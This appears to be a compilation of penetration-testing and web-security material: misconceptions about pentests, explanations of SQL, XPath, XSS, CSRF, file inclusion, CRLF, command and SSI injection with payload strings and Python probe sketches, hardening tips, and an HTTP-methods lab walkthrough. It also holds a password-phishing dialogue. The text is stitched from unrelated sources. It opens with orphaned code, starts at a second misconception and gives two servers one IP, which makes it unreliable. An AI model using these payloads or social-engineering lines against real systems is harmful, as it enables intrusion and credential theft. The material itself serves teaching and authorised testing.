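# Print the findings with the highest-scoring (most urgent) first.
for name, *factors in sorted(findings, key=lambda f: -risk_score(*f[1:])):
    print(f"{risk_score(*factors):4d}  {name}")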

Penetration Test Clarity


In essence, the purpose of a penetration test in this context is to test an assertion. Here we are testing the assertion made by an organization that the "something" is sufficiently impenetrable. In other words, we are testing an assertion from an organization that they have done all they need to do to secure the resources they want to secure. They have fixed some vulnerabilities, mitigated others, transferred risk for others, and finally accepted risk for the remaining, such that the "something" is sufficiently secure. Examples of assertions that organizations require penetration tests to examine are:

1. All user passwords are strong on critical systems.
2. Physical access to my server room is solid.
3. My domain administrator access on my domain is secure.
4. Customer data (e.g. credit card information) resident on my systems is not accessible to unauthorized users.

All of these are goals for a penetration test. The organization asserts that it has sufficiently protected itself to the degree that the assertions should prove to be true. PCI Data Security Standard requirement 11.3 requires that an organization that stores credit card holder data engage in a penetration test to validate that this information is secure. In essence, PCI requires that the organization assert that it is secure in this regard, and requires that the organization test this assertion. With this defined, I raise the following misconception regarding penetration testing as it relates to vulnerability assessments:

Misconception #2 - A penetration test is testing to see if vulnerabilities are actually present.

In a penetration test, the "something" that we are testing is not the validity of the found vulnerabilities. If we wanted more accurate vulnerability identification, we would ensure that we used more accurate means to identify vulnerabilities; we would not use a penetration test to validate them. Once again, penetration testing assesses the organization's assertion that it is secure. Another misconception regarding penetration testing is:

Misconception #3 - Penetration tests only involve network hacking tools.

A penetration test, as seen above, is simply a test that examines an assertion by the organization for a given goal. It may involve the use of social engineering tactics, physical security hacking tactics, Google hacking, and, of course, the use of network hacking tools.

Vulnerability Assessment and Penetration Test Relations


The relationship between a vulnerability assessment and a penetration test is analogous to the academic activities of studying for an exam and then taking the exam. It is unwise for a student to take an exam without adequate preparation. When the student attends the exam on exam day, they are in essence asserting that they understand the material. The exam may test only a small part of the material at hand, and its goal is to confirm the student's assertion. A penetration test may appear similar to a vulnerability assessment because it involves vulnerability enumeration to some extent. However, it will likely not be exhaustive and therefore will not include an identification of vulnerabilities to the same extent as a vulnerability assessment. Penetration tests are resource-intensive and goal-oriented. Like an attacker, a penetration tester will take the easiest route to achieving the goal or set of goals. The following figure illustrates the relation between Vulnerability Management and Penetration Testing:

As depicted above, an organization bearing security risk should engage in an ongoing vulnerability management program. Although not shown in the diagram, the program should consist of ongoing measurements that determine the risk level. The organization should only engage in a penetration test when it has done what it can to lower the risk to the desired level. At some point in time, the organization should assert that it is confident it has secured what is important, and only then should it engage in a penetration test.

Vulnerability Detection

After having gathered the relevant information about the targeted systems, the next step is to determine the vulnerabilities that exist in each system. Penetration testers should have a collection of exploits and vulnerabilities at their disposal for this purpose. The knowledge of the penetration tester is put to the test here: an analysis is done on the information obtained to determine any possible vulnerability that might exist. This is called manual vulnerability scanning, as the detection of vulnerabilities is done manually. An example is the "dot bug" that existed in MS Personal Web Server back in 1998: a bug in IIS 3.0 that allowed ASP source code to be downloaded by appending a "." to the filename. Microsoft eventually fixed this bug in IIS but did not fix the same hole in Personal Web Server at the time, and some Personal Web Server installations retain this vulnerability to this day. If a system running Windows 95 and MS Personal Web Server pops up in the information gathered earlier, this would probably be a vulnerability that exists on that particular system. There are also tools available that can automate vulnerability detection. One such tool is Nessus (http://www.nessus.org), a security scanner that remotely audits a given network and determines whether vulnerabilities exist in it. It produces a list of vulnerabilities that exist in a network as well as steps that should be taken to address them.

SQL injection
SQL injection can occur when unvalidated user input is used to construct an SQL query that is then executed by the web server. A well-known example is the query used by a user login. This query usually looks like "SELECT * FROM users WHERE username='entered username' AND password='entered password'". If an attacker enters the string x' OR '1'='1 in both the username and the password fields, the query becomes "SELECT * FROM users WHERE username='x' OR '1'='1' AND password='x' OR '1'='1' ". Because '1' is always equal to '1', this query is true for all records in the database. There are two different types of SQL injection: blind SQL injection and "normal" SQL injection. The difference between these two types is that for "normal" SQL injection the server shows an error message when the SQL query's syntax is incorrect; for blind SQL injection this error message is not shown, and the attacker instead sees a generic error message or page. "Normal" SQL injection can be tested for by entering characters like quotes to create a query with an incorrect syntax and searching the page for error messages about it. Blind SQL injection cannot be detected this way; instead the attacker has to enter SQL commands like sleep, or statements that are always true or false. For instance, trying both strings ' AND '1'='1 and ' AND '1'='2 will likely produce different results if the page is vulnerable to SQL injection.
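The following minimal Python sketch reproduces the flaw and its fix using an in-memory SQLite database; the table layout and credentials are assumptions made purely for illustration:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'secret')")

user = "x' OR '1'='1"
pw = "x' OR '1'='1"

# Vulnerable: user input is concatenated straight into the query string.
query = f"SELECT * FROM users WHERE username='{user}' AND password='{pw}'"
print(conn.execute(query).fetchall())  # returns every row in the table

# Safe: a parameterized query treats the input as data, not as SQL.
query = "SELECT * FROM users WHERE username=? AND password=?"
print(conn.execute(query, (user, pw)).fetchall())  # returns no rows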

XPath injection
XPath injection (also known as Blind XPath Injection) is similar to SQL injection. The difference between the two vulnerabilities is that SQL injection targets a SQL database, whereas XPath injection targets an XML file, as XPath is a query language for XML data. Just like SQL injection, the attack is based on sending malformed input to the web application. This way the attacker can discover how the XML data is structured or access data he is not allowed to see.

Just like SQL injection, there are two types of XPath injection: "normal" XPath injection and blind XPath injection. The difference between the two is that for blind XPath injection the attacker has no knowledge about the structure of the XML document and the application does not provide useful error messages. Testing for XPath injection is also similar to SQL injection: the first step would be to insert a quote in an input field to see if it produces an error message. For blind XPath injection, data is injected to create a query that always evaluates to true or false.
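A minimal illustration of the same idea against XML, in Python using the third-party lxml library; the document layout and the login helper are assumptions for demonstration:

from lxml import etree

doc = etree.fromstring(
    "<users><user><name>alice</name><pw>secret</pw></user></users>")

def login(name, pw):
    # Vulnerable: user input is pasted straight into the XPath expression.
    query = f"//user[name/text()='{name}' and pw/text()='{pw}']"
    return bool(doc.xpath(query))

print(login("alice", "wrong"))                # False
print(login("x' or '1'='1", "x' or '1'='1"))  # True - predicate is always true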

XSS
Cross-site scripting is often abbreviated as XSS. In short, it occurs when an attacker can input HTML code (such as JavaScript) that will then be executed for the visitors of the site. An example would be a guest book that shows the text that is entered in the guest book on the website. If an attacker enters the string <script>alert('XSS');</script>, a pop-up with the text "XSS" would be shown on that page of the guest book. This type of vulnerability can also be exploited in a more serious way: an attacker might use XSS to steal a user's cookie, which can then be used to impersonate the user on a website. There are three different types of XSS: stored XSS, reflected XSS and DOM-based XSS. The differences between these types are that for stored XSS the attacker's code is stored on the web server, whereas for reflected XSS the attacker's code is added to a link to the web application (e.g. in a GET parameter) and the attacker has to trick a user into clicking on the link. Such a link would look like http://www.example.com/index.php?input=<script>alert('XSS');</script>. For DOM-based XSS the attacker's code is not injected into the web application; instead the attacker uses existing JavaScript code on the target page to write text (e.g. <script>alert('XSS');</script>) on the page. To test for this vulnerability, a penetration testing tool should try to input HTML code in the inputs on a web application.
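As a sketch of such a test, the following Python function (using the third-party requests library; the URL and parameter name passed in are whatever the tester has mapped) sends the classic payload and checks whether it is reflected unencoded. This only covers the reflected variant; stored and DOM-based XSS need more involved checks:

import requests

PAYLOAD = "<script>alert('XSS');</script>"

def reflects_payload(url, param):
    # Send the payload in a GET parameter and check whether it comes
    # back in the response body without being HTML-encoded.
    r = requests.get(url, params={param: PAYLOAD}, timeout=10)
    return PAYLOAD in r.text

# e.g. reflects_payload("http://www.example.com/index.php", "input")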

Cross site tracing


Cross Site Tracing, often abbreviated as XST, is an attack that abuses the HTTP TRACE method. This method can be used to test web applications, as the web server replies with the same data that is sent to it via the TRACE command. An attacker can trick the web application into sending its normal headers via the TRACE command, which allows the attacker to read information in the headers, such as a cookie. To test for this vulnerability, the penetration testing tool has to request OPTIONS from the web server and see whether the Allow header lists TRACE. If it does, the tool should try to request the page via the TRACE command.
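A minimal sketch of that two-step check in Python, using only the standard library; the probe header name is an arbitrary marker chosen for this example:

import http.client

def trace_enabled(host, port=80):
    conn = http.client.HTTPConnection(host, port, timeout=10)
    # Step 1: ask the server which methods it allows.
    conn.request("OPTIONS", "/")
    resp = conn.getresponse()
    allow = resp.getheader("Allow", "") or ""
    resp.read()  # drain the body so the connection can be reused
    if "TRACE" not in allow.upper():
        return False
    # Step 2: send a TRACE with a marker header; a vulnerable server
    # echoes the whole request back, marker included.
    conn.request("TRACE", "/", headers={"X-Probe": "xst-test"})
    return b"X-Probe" in conn.getresponse().read()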

CSRF
Cross-Site Request Forgery, often abbreviated as CSRF, is an attack where an attacker tricks a user's browser into loading a request that performs an action on a web application that the user is currently authenticated to. For example, an attacker might post the following HTML on a website or send it in an HTML email: <img src="http://www.bank.com/transfer_money?amount=10000&target_account=12345">. If the user is authenticated at his bank's website (at http://www.bank.com) when this link is loaded, it would transfer 10,000 from the user's account to bank account number 12345. Testing for this attack is similar to testing for XSS: the tool has to check whether it can inject a link that may have an effect on another web application (e.g. the link in the example) into the web application that is being tested.

Local File inclusion


Local File Inclusion, also known as path traversal or directory traversal, means that a file on the same server as the one where the web application is running is included on the page. A common example would be a web application with the URL http://www.example.com/index.php?file=somefile.txt; by manipulating the file parameter, the attacker might be able to load a file that he should not be able to see. A tool can test for this vulnerability by entering a path to a local file (usually /etc/passwd) in an input or GET parameter. This can be done with an absolute path (e.g. /etc/passwd) or a relative path (e.g. ../../../../../etc/passwd). The tool then has to check whether the contents of the local file are present on the page.
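A minimal Python sketch of such a probe (third-party requests library; the traversal depth and the "root:" marker are conventional choices assumed for this example):

import requests

CANDIDATES = ["/etc/passwd", "../../../../../etc/passwd"]

def lfi_check(url, param):
    # Try an absolute and a relative path to /etc/passwd and look for
    # the tell-tale 'root:' line in the response body.
    for path in CANDIDATES:
        r = requests.get(url, params={param: path}, timeout=10)
        if "root:" in r.text:
            return path
    return None

# e.g. lfi_check("http://www.example.com/index.php", "file")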

Remote File inclusion


Remote File Inclusion is similar to Local File Inclusion, except that the included file comes from a different server than the one the web application is running on. An example of this vulnerability is the same as for Local File Inclusion; however, instead of changing the file name parameter to a local file, the attacker enters a path to a remote file. Testing for this vulnerability is also similar to Local File Inclusion, except that a path to a remote file is used instead of a path to a local file (e.g. http://www.something.com/index.html).

HTTP response splitting


HTTP Response Splitting, also known as CRLF injection, is an attack where the attacker controls data that is used in an HTTP response header and enters a newline into this data. For example, if a web application performs a redirect via a GET parameter (e.g. http://www.example.com/index.php?page=somepage.html), this redirect is sent via the HTTP headers to the browser (the "Location" header). An attacker can append a newline to the value of the GET parameter and add his own headers. This way an attacker can add a "normal" response header and thereby cause text of his choosing to appear on the web application. A penetration testing tool has to enter a newline, followed by an HTTP header, into inputs that may end up in the HTTP response headers. The tool then has to check whether the server returns the header that was injected.
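A rough sketch of that check in Python (third-party requests library); the marker header X-Injected is an arbitrary choice for this example, and the value is pre-encoded so the CRLF bytes survive the request:

import requests
from urllib.parse import quote

# URL-encode a value that ends the intended header and starts our own.
INJECTION = quote("somepage.html\r\nX-Injected: crlf-test")

def crlf_check(url, param):
    r = requests.get(f"{url}?{param}={INJECTION}",
                     timeout=10, allow_redirects=False)
    # If the marker shows up as a real response header, the parameter
    # reached the response headers unfiltered.
    return r.headers.get("X-Injected") == "crlf-test"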

Command injection
Command injection means that the attacker can execute a command on the server. An example would be a web application that lets the user enter an IP address that the server will then ping. If an attacker enters the string 1.2.3.4;ls, the server sends a ping to the IP address 1.2.3.4 and then runs the command "ls". This vulnerability can be tested by a penetration testing tool by entering a semicolon followed by a command (e.g. "ls") into an input field that may be vulnerable and checking whether the response of the web application contains the output of the injected command.
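A minimal probe along those lines in Python (third-party requests library); it injects id rather than ls because the uid= line in its output is easy to fingerprint, and the URL, parameter and seed value are assumptions for illustration:

import requests

def cmd_injection_check(url, param, seed="1.2.3.4"):
    # Append ';id' to an otherwise valid value; 'uid=' appearing in the
    # response indicates the injected command was executed.
    r = requests.get(url, params={param: seed + ";id"}, timeout=15)
    return "uid=" in r.text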

SSI injection
Server-Side Includes injection, often abbreviated to SSI injection, is an attack where the attacker can enter SSI directives (e.g. <!--#include file="file.txt" --> or <!--#exec cmd="ls -l" -->) that are then executed by the web server. To test for SSI injection, a penetration testing tool has to enter SSI directives in the inputs of a web application and check whether the web server executes them by searching the web page for the results of the SSI directive.

Buffer overflow
In short, a buffer overflow occurs when an application tries to store more data in a buffer than the buffer can hold. Testing for buffer overflows is relatively easy: the tool has to input long (random) data and see whether this produces any errors caused by trying to store more data than fits in the buffer.
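A crude sketch of such a probe against a raw network service in Python; the payload length is arbitrary, and a real test would try several lengths and patterns:

import socket

def overflow_probe(host, port, length=10000):
    # Send an overly long string and watch how the service reacts.
    payload = b"A" * length + b"\r\n"
    try:
        with socket.create_connection((host, port), timeout=10) as s:
            s.sendall(payload)
            return s.recv(1024)  # empty reply suggests the service died
    except (ConnectionResetError, socket.timeout):
        return None  # reset or hang - worth investigating further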

Penetration Attempt
After determining the vulnerabilities that exist in the systems, the next stage is to identify suitable targets for a penetration attempt. The time and effort that need to be put in for the systems that have vulnerabilities must be estimated accordingly, so estimates of how long a penetration attempt will take on a particular system are important at this point. The target chosen for the penetration attempt is also important. Imagine a scenario whereby two penetration testers are required to perform a penetration test on a network consisting of more than 200 machines. After gathering sufficient information and vulnerabilities about the network, they find out that there are only 5 servers on the network and the rest are just normal PCs used by the organization's staff. Common sense tells them that the likely targets are these 5 servers. One practice in many organizations is to name machines in a way that indicates what each machine does, so the computer name of the target is sometimes a decisive factor for choosing targets. Often, after a network survey, you will find computer names like SourceCode_PC, Int_Surfing and others that give penetration testers an idea of what the machine does. By choosing their targets properly, penetration testers will not waste time and effort doing redundant work; penetration tests normally have a time constraint and penetration testers should not waste any time unnecessarily. There are other ways to choose a target; the above just demonstrates some of the criteria used. After choosing the suitable targets, the penetration attempt is performed on these chosen targets. There are some tools available for free via the Internet, but they generally require customization. Knowing that a vulnerability exists on a target does not always imply that it can be exploited easily, so it is not always possible to penetrate successfully even though it is theoretically possible. In any case, exploits that exist should be tested on the target first before conducting any other penetration attempt. Password cracking has become a normal practice in penetration tests. In most cases, you'll find services such as telnet and FTP running on systems; this is a good place to start and to use password cracking methods to penetrate these systems. The list below shows some of the password cracking methods used:

Dictionary Attack - Uses a word list or dictionary file.
Hybrid Crack - Tests for passwords that are variations of the words in a dictionary file.
Brute Force - Tests for passwords that are made up of characters, going through all possible combinations.

There is a very good tool, called Brutus, that can be used to automate telnet and FTP account cracking. The penetration attempts do not end here. There are two more suitable methods to attempt a penetration: social engineering and testing the organization's physical security. Social engineering is an art used by hackers that capitalizes on the weakness of the human element of the organization's defense. The dialog below shows an example of how an attacker can exploit the weakness of an employee in a large organization:

Attacker: Hi Ms Lee, this is Steven from the IS Department. I've found a virus stuck in your mail box and would like to help you remove it. Can I have the password to your email?

Ms Lee (the secretary): A virus? That's terrible. My password is magnum. Please help me clean it up.

There is no harm in deploying social engineering and using it numerous times to obtain critical information from the organization's employees. This, of course, is bound by the agreement that the organization allows such methods to be used during the penetration tests. Physical security testing involves penetration testers trying to gain access to the organization's facility by defeating its physical security. Social engineering can be used to get past the organization's physical security as well. The main focus of this paper is penetration testing, but there is often some confusion between penetration testing and vulnerability assessment. The two terms are related, but penetration testing places more emphasis on gaining as much access as possible, while vulnerability testing places the emphasis on identifying areas that are vulnerable to a computer attack. An automated vulnerability scanner will often identify possible vulnerabilities based on service banners or other network responses that are not in fact what they seem. A vulnerability assessor will stop just before compromising a system, whereas a penetration tester will go as far as they can within the scope of the contract. It is important to keep in mind that you are dealing with a test. A penetration test is like any other test in the sense that it is a sampling of all possible systems and configurations. Unless the contractor is hired to test only a single system, they will be unable to identify and penetrate all possible systems using all possible vulnerabilities. As such, any penetration test is a sampling of the environment. Furthermore, most testers will go after the easiest targets first.

How Vulnerabilities Are Identified


Vulnerabilities need to be identified by both the penetration tester and the vulnerability scanner. The steps are similar for the security tester and an unauthorized attacker. The attacker may choose to proceed more slowly to avoid detection, but some penetration testers will also start slowly so that the target company can learn where its detection threshold is and make improvements. The first step in either a penetration test or a vulnerability scan is reconnaissance. This is where the tester attempts to learn as much as possible about the target network. This normally starts with identifying publicly accessible services, such as mail and web servers, from their service banners. Many servers will report the operating system they are running on, the version of software they are running, patches and modules that have been enabled, the current time, and perhaps even some internal information like an internal server name or IP address. Once the tester has an idea what software might be running on the target computers, that information needs to be verified. The tester does not really KNOW what is running, but may have a pretty good idea. The information that the tester has can be combined and then compared with known vulnerabilities, and those vulnerabilities can then be tested to see if the results support or contradict the prior information. In a stealthy penetration test, these first steps may be repeated for some time before the tester decides to launch a specific attack. In the case of a strict vulnerability assessment, the attack may never be launched, so the owners of the target computer would never really know whether this was an exploitable vulnerability or not.

VULNERABILITY IDENTIFICATION
The analysis of the threat to an IT system must include an analysis of the vulnerabilities associated with the system environment. The goal of this step is to develop a list of system vulnerabilities (flaws or weaknesses) that could be exploited by the potential threat-sources.

Vulnerability: A flaw or weakness in system security procedures, design, implementation, or internal controls that could be exercised (accidentally triggered or intentionally exploited) and result in a security breach or a violation of the system's security policy.

The following sample pairings illustrate vulnerabilities with their corresponding threat-sources and threat actions:

Vulnerability: Terminated employees' system identifiers (IDs) are not removed from the system.
Threat-Source: Terminated employees.
Threat Action: Dialing into the company's network and accessing company proprietary data.

Vulnerability: Company firewall allows inbound telnet, and the guest ID is enabled on the XYZ server.
Threat-Source: Unauthorized users (e.g., hackers, terminated employees, computer criminals, terrorists).
Threat Action: Using telnet to the XYZ server and browsing system files with the guest ID.

Vulnerability: The vendor has identified flaws in the security design of the system; however, new patches have not been applied to the system.
Threat-Source: Unauthorized users (e.g., hackers, disgruntled employees, computer criminals, terrorists).
Threat Action: Obtaining unauthorized access to sensitive system files based on known system vulnerabilities.

Vulnerability: The data center uses water sprinklers to suppress fire; tarpaulins to protect hardware and equipment from water damage are not in place.
Threat-Source: Fire, negligent persons.
Threat Action: Water sprinklers being turned on in the data center.

Recommended methods for identifying system vulnerabilities are the use of vulnerability sources, the performance of system security testing, and the development of a security requirements checklist. It should be noted that the types of vulnerabilities that will exist, and the methodology needed to determine whether the vulnerabilities are present, will usually vary depending on the nature of the IT system and the phase it is in within the SDLC:

If the IT system has not yet been designed, the search for vulnerabilities should focus on the organization's security policies, planned security procedures, system requirement definitions, and the vendors' or developers' security product analyses (e.g., white papers).

If the IT system is being implemented, the identification of vulnerabilities should be expanded to include more specific information, such as the planned security features described in the security design documentation and the results of system certification testing and evaluation.

If the IT system is operational, the process of identifying vulnerabilities should include an analysis of the IT system security features and the security controls, technical and procedural, used to protect the system.

Preventing and detecting security vulnerabilities in Web applications


As Web applications become the regular locus of online business, so too are they becoming the frequent targets of attackers. Unfortunately, many Web applications are fraught with vulnerabilities, a fair number of which result from an insufficient focus on security during the development process.

While the scope of the fundamental security flaws in some applications often requires a re-architecture, there are several secondary measures infosec teams can implement to safeguard flawed applications. This tip covers a few of the steps that information security professionals can take to lock down their Web apps.

Using VPNs
For starters, as a best practice, certain functionality should only be accessible via a VPN. All admin functionality, for instance, should be remapped onto internal IPs, which can then only be accessed from certain IPs over a VPN. Example functions include content management systems (CMS), server status scripts (server-status), and info scripts or SQL admin programs. Recently, HBGary Federal was attacked partly because the company allowed its CMS to be exposed on public IPs accessible from the Internet. It is also prudent to restrict Web services access to internal IPs only, unless you intend to give other companies access to them, in which case those companies should also be provided with credentials for service access.

Correcting coding errors


Programmers frequently rely too heavily on frameworks (like the .NET validate-request feature) to defend against dangerous inputs, or use application firewalls based on signatures that work by blacklisting the various attack vectors published by hackers in cross-site scripting (XSS) or SQL injection cheat sheets. This approach is flawed, as custom attacks can -- and often do -- bypass the protection afforded by .NET and simple blacklists. The best approach for addressing such security vulnerabilities in Web applications is to correctly validate the input when the software is written, or to update the code after the app has been deployed with the help of a programmer or pen tester. Similarly, it is common for programmers to filter only quotes on input passed to SQL queries, and, as such, numeric inputs are commonly found vulnerable to SQL injection, as quotes are not needed in order to escape into SQL commands from numeric inputs. Another commonly neglected coding area is user authentication; existing usernames/email addresses are often enumerated via registration or forgotten-password mechanisms, which can allow valid logins to be brute-forced. The more popular the target website is, and the more users it supports, the easier it becomes to enumerate accounts by brute force. One fix for this would be implementing CAPTCHAs. Coding errors have also become more prevalent in file upload and download functionality in applications that, for instance, enable people to upload pictures. Common coding errors might allow shell code to be uploaded to attack the server, or malicious files to be uploaded for other users which, when viewed, can be used to attack other users' machines. As such, it's necessary to have regular pen tests to discover and eradicate any such vulnerabilities.

Authentication and access control


Perhaps the greatest area of concern is that passwords are often shared between websites, with a single set of credentials (email address and password) used to access eBay, PayPal and corporate email, for instance. Let's say a social network website with hundreds of thousands of users is hacked, and immediately after the shell code is run, all the usernames, emails and passwords are remotely accessed by the attacker. It's common for an attacker to immediately attempt to use stolen credentials to access victims' accounts on other websites to obtain payment card data or financial account access, or to sell the credentials to other parties interested in perpetrating fraud. To defend against this, it's common for banks and other organisations to implement additional authentication methods, using IP address checks, tokens, pinpads and other similar devices, as usernames and passwords alone are no longer considered secure.

Giving unnecessary rights to users is another area of concern, whether they be rights to a SQL Server database or to the service account that the application or Web server runs under. Excessive rights allow SQL tables to be dropped, commands to be run on SQL servers, or the Web server to run a wide range of programs, some of which might have privilege escalation vulnerabilities. While performing a recent pen test, I obtained a shell within an application server. Even though I was unable to escalate my privileges, the account had the ability to download and compile programs like port scanners, which allowed me to demonstrate that the machine could be used to stage further attacks into the network. Thus, making sure that users -- and programs that run as users -- have the minimum rights necessary to do their jobs, and no more, is of utmost importance.

Cleaning up error pages


It is still common for default error pages to be left in place; this might, for instance, allow the SQL database structure to be easily enumerated. More serious is that such errors are likely to be captured by Google or other search engine crawls, which hacker groups can then use to discover servers potentially vulnerable to attack. When I hear of a high-profile website compromise, the first thing I do is inspect the Google cache for reported errors and, in approximately 80% of cases, the Google cache contains a number of errors stored from the website. An organisation's developers can detect such pages by downing the SQL server to produce a SQL timeout error page within the development environment, and then, to prevent such pages from causing harm by exposing information, make the program redirect to the homepage instead of displaying such errors (a minimal sketch follows below). Other regular causes for concern include the following:

Default accounts with usernames such as 'admin,' 'administrator,' 'anonymous' or 'test'. Such accounts are rarely removed or renamed, which makes things easier for attackers, as only the password needs to be brute-forced.

Broken access control mechanisms, which allow users to read or modify other users' documents. This can be achieved by knowing the document ID or, if the document name is predictable, by guessing other document names -- and, in the same manner, by gaining access to admin programs by brute-forcing program names within directories found to exist, such as /admin/.

Cross-site request forgery flaws, which can be used to take over users' accounts within websites. Once an attacker takes over an account, he or she can then message other users from the account, or perform other actions, like forwarding messages to the compromised user's mailing list and/or changing their passwords.
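As a sketch of the redirect-on-error idea above, this is how it might look in a Python application built on the third-party Flask framework; the framework choice is an assumption for illustration, and the same pattern applies to the custom error pages of any web stack:

from flask import Flask, redirect

app = Flask(__name__)

@app.errorhandler(500)
def internal_error(exc):
    # Log the full details server-side; the visitor only ever sees
    # a redirect to the home page, never a stack trace or SQL error.
    app.logger.exception(exc)
    return redirect("/")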

PENETRATION TESTING OF A WEB APPLICATION USING HTTP METHODS


HTTP methods are functions that a web server provides to process a request. For example, the GET method is used to retrieve the web page from the server. According to RFC 2616, there are eight HTTP methods for HTTP 1.1, specifically OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, and CONNECT, and this set can be extended. In this section, the functions of the methods are described briefly with an explanation of why some of them are dangerous. The OPTIONS method is used to request available methods on a server, while the GET

method is used to retrieve the information that is requested. The GET method is one of the most common ways to retrieve web resources. The HEAD method is similar to the GET method, but is used to retrieve only header information. The POST method is used to send a request with an entity enclosed in the body; the response to this request is determined by the server. The PUT method is used to store the enclosed entity on the server, while the DELETE method is used to remove resources from the server. The TRACE method is employed to return the request that was received by the final recipient from the client, so that the client can diagnose the communication. Finally, the CONNECT method creates a tunnel with a proxy. There are also extended HTTP methods such as Web-based Distributed Authoring and Versioning (WEBDAV). WEBDAV can be used by clients to publish web contents and involves a number of other HTTP methods such as PROPFIND, MOVE, COPY, LOCK, UNLOCK, and MKCOL (Goland, Whitehead, Faizi, Carter, & Jensen, 1999). HTTP methods can help developers in the deployment and testing of web applications. On the other hand, when they are configured improperly, these methods can be used for malicious activity.

Dangerous Use of HTTP methods


Most of the HTTP methods mentioned above can be utilized to attack a web application. While GET and POST are used in most attacks, the methods themselves are not the problem and are required by a common web server. The PUT, DELETE, and CONNECT methods, however, are not required by most web servers, and it is dangerous to have them enabled on a web application because they can significantly impact its security. This section explains why these methods are dangerous and provides examples of utilizing them to attack a web application. First, the PUT method can be used to introduce malicious code and shells to the target. If the PUT method is available on a JBOSS server, it is possible to upload JSP shells that can be used to execute malicious commands on the server (Sutherland, 2011). Moreover, this method can be employed to launch a phishing attack: the attacker can upload an HTML page with hyperlinks that redirect a victim to a malicious website, or a malicious login form that collects users' confidential information. Second, the DELETE method can be used to remove important files in the application, causing denial of service, or to remove access configuration files, such as .htaccess on an Apache server, to gain unauthorized access (SANS Institute, 2009). Third, the CONNECT method can be employed to tunnel peer-to-peer (P2P) traffic over HTTP traffic. Since the network traffic is tunneled, the attacker can hide the contents of the traffic as well as bypass firewalls or security devices. As a result, detecting this unauthorized traffic is difficult because it is often hidden in ways that make it almost indistinguishable from normal authorized traffic (Alman, 2003). Additionally, the HEAD method is not considered dangerous in itself, but it can be used to attack a web application by mimicking a GET request. For example, the default security constraint of a JAVA EE web.xml file restricts only the GET and POST methods, so a HEAD request can be sent to the target URL to initiate execution and bypass the authentication. The penetration tester can actually use different verbs such as TRACE, PUT, DELETE, and even arbitrary strings such as HEED (Dabirsiaghi, 2008).
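To make the PUT risk concrete, the following Python sketch (third-party requests library; the file name and marker string are arbitrary choices for this test) uploads a harmless text file and fetches it back, which is usually enough to demonstrate the exposure without planting a shell:

import requests

MARKER = "put-method-test"

def put_enabled(base_url):
    target = base_url.rstrip("/") + "/puttest.txt"
    # Upload a harmless file, then fetch it back to confirm it landed.
    up = requests.put(target, data=MARKER, timeout=10)
    if up.status_code not in (200, 201, 204):
        return False
    ok = MARKER in requests.get(target, timeout=10).text
    requests.delete(target, timeout=10)  # clean up if DELETE is open too
    return ok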

Penetration Testing Scenarios


We will discuss the use of dangerous HTTP methods during a penetration test. In order to show how and when to use each method, we will cover the steps of a penetration test: reconnaissance, mapping, discovery and exploitation. Furthermore, there are three phases of testing in the demonstration, and each phase follows the steps mentioned above. The first phase uses the HEAD method to attack a public web server. The second phase uses the PUT/DELETE methods to attack an intranet server. Finally, the last phase uses the CONNECT method to attack

a firewall. Since the purpose of this paper is to demonstrate the usage of dangerous HTTP methods, some general steps, such as NMAP scanning, are not described extensively.

The Testing Lab Environment


The lab resembles a company network that has two DMZ networks protected by a firewall. Figure 1 shows the network diagram of the company. This network was built with the VMWARE team feature, which creates a virtual LAN segment. All three LAN segments are connected by the virtual router/firewall, Vyatta 6.0. Since this is a virtual lab, a private IP address range has been used. A subnet 10.10.10.0/24 has been assigned to the external network, and IP address 10.10.10.1 has been reserved for the firewall's external interface. For this demonstration, IP address 10.10.10.10 is reserved for the penetration tester's laptop. Another subnet, 192.168.10.0/24, has been assigned to the DMZ 1 network; IP address 192.168.10.1 has been reserved for the firewall's DMZ 1 interface, and IP address 192.168.10.10 has been reserved for a public web server. A subnet 192.168.65.0/24 has been assigned to the DMZ 2 network, while IP address 192.168.65.1 has been reserved for the firewall's DMZ 2 interface. Two servers, an intranet web server and a proxy server, are connected to the DMZ 2 network. IP address 192.168.65.10 has been reserved for the intranet web server and IP address 192.168.65.10 has been reserved for the proxy server. The firewall restricts access to these networks. A host in the DMZ 1 network is only accessible via TCP port 80 from both the outside and the inside. A host in the DMZ 1 network can access hosts in any other network through TCP ports 80 and 8080 only. Hosts in the DMZ 2 network are not accessible from the outside network, but the DMZ 1 network is allowed to access the proxy server via TCP ports 80 and 8080.

Network diagram

Compromising Public Web Server


This section demonstrates how the penetration tester gains access to the public web server by taking advantage of an HTTP method that is enabled on it.

Reconnaissance
This penetration test is a black box test; the penetration tester does not have any knowledge about the target systems. At this point, the penetration tester only knows the company name and its IP address ranges, which are subnet 10.10.10.0/24 and subnet 192.168.10.0/24. First, the penetration tester runs an NMAP scan against these two networks and finds the following information - 10.10.10.1: network device with no ports open; 192.168.10.10: Windows XP running Tomcat 5.0/JBOSS 4.0 with TCP port 80 open. Since port 80 is listening on host 192.168.10.10, the penetration tester does a further check and finds out that HTTP methods are enabled on the host. There are several ways to check the enabled methods; the easiest is a telnet command, as shown in the figure below. The result shows that the host accepts many dangerous HTTP methods, such as PUT and DELETE.

telnet 192.168.10.10 80
OPTIONS / HTTP/1.1
Host: 192.168.10.10

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4: Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Allow: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS
Content-Length: 0
Date: Tue, 03 Jan 2012 20:07:11 GMT
Server: Apache-Coyote/1.1

The Nmap scripting engine is a powerful tool for user-created scripts. This power is demonstrated in the suite of scripts designed to inspect Windows over the SMB protocol. Many footprinting tasks can be performed, including finding user accounts, open shares, and weak passwords. All these tasks are under a common framework and share authentication libraries, which gives users a common and familiar interface. With modern script libraries, which were written by the author, the Nmap Scripting Engine (NSE) has the ability to establish a null or authenticated session with all modern versions of Windows. By leveraging these sessions, scripts have the ability to probe and explore Windows systems in great depth, providing an attacker with invaluable information about the server. Nmap, a network scanner, is among the best known security tools, and is considered to be one of the best free security tools in existence (Darknet, 2006). The typical use and functionality of Nmap are beyond the scope of this paper, but familiarity with them will make this paper far easier to understand. The book Nmap Network Scanning, which is partially available for free, is one of the best information sources (Lyon, 2009). The Nmap Scripting Engine, or NSE, is an extension to Nmap developed with several purposes in mind, including advanced network discovery, sophisticated version detection, vulnerability detection, backdoor detection, and vulnerability exploitation (Lyon, 2009). After Nmap scans a group of hosts, NSE runs scripts against each host that 